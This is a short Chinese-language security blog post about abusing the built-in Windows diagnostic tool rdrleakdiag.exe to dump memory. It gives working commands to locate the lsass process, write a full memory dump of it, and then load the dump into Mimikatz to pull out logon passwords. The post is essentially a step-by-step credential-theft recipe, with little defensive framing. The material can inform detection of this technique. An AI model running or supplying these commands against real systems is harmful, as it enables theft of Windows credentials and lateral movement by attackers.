使用 rdrleakdiag.exe 转储进程

2020-09-15

rdrleakdiag.exe


最近在 Twitter 看到有安全研究员公示了一个用于进程转储的工具,且在 Windows 的多版本中属于系统自带的程序,如果目标不存在此程序,也可以上传执行,程序本身的目的是用于资源泄露诊断,但是现在可以利用它转储指定的进程,推主贴出了用于进程转储的参数;

在 Windows 10 操作系统共发现了四个 “rdrleakdiag.exe” 程序;

在这里我们以 “ C:\Windows\System32” 目录下的 “rdrleakdiag.exe” 用作测试,首先使用 cmd 命令查找 lsass 进程的 pid;

tasklist /svc | findstr lsass

可以看到 lsass 的进程 pid 为 548;

使用如下命令转储进程;

rdrleakdiag.exe /p 548 /o C:\Users\Administrator\Desktop\ /fullmemdmp /wait 1

可以看到桌面上已经生成了两个文件,将其 dmp 文件拷贝至 Mimikatz 目录下,而后使用 Mimikatz 载入 dmp 文件,使用如下两条命令即可;

sekurlsa::minidump minidump_548.dmp
sekurlsa::logonpasswords

Reference


https://twitter.com/0gtweet/status/1299071304805560321